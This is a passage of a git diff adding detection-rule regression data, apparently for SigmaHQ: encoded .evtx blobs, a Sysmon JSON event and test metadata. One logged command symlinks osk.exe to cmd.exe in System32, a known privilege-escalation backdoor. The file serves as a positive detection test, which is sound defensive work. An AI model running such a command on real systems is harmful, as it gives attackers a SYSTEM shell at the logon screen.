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 L5l{q{5d!}Q)H$!F literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.json b/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.json new file mode 100644 index 000000000..7e984c958 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:15:18.885132Z" + } + }, + "EventRecordID": 8471746, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:15:18.879", + "ProcessGuid": "5AA13A44-CD66-68FC-F12F-000000004002", + "ProcessId": 8620, + "Image": "C:\\Windows\\System32\\cmd.exe", + "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c \"mklink C:\\Windows\\System32\\osk.exe C:\\Windows\\System32\\cmd.exe\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml b/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml new file mode 100644 index 000000000..faafff6e7 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml @@ -0,0 +1,13 @@ +id: 20e20ac5-43f2-40a3-811c-53466d1be222 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: e9b61244-893f-427c-b287-3e708f321c6b + title: Potential Privilege Escalation Using Symlink Between Osk and Cmd +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.evtx b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.evtx new file mode 100644 index 0000000000000000000000000000000000000000..6acc866af93f5644645a8c4f02e9df71b84e60d1 GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.json b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.json new file mode 100644 index 000000000..688d20394 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:16:49.968129Z" + } + }, + "EventRecordID": 8498306, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:16:49.961", + "ProcessGuid": "5AA13A44-CDC1-68FC-F82F-000000004002", + "ProcessId": 608, + "Image": "C:\\Windows\\System32\\cmd.exe", + 